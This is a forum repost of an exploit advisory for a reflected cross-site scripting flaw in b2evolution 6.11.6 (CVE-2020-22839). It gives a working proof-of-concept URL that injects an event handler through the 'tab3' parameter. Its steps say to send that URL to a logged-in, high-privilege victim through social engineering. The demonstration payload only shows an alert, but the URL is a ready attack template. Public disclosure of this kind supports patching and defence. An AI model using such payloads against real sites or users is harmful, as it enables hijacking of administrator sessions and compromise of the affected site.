Jump to content

b2evolution 6.11.6 - 'tab3' Reflected XSS

This CHT

Recommended Posts

  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,702
  • With Us For:  243 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
# CVE: CVE-2020-22839
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux

--------------------------Proof of Concept-----------------------

Steps to Reproduce:

1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
3. The vulnerable parameter in this case is “tab3”.
Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...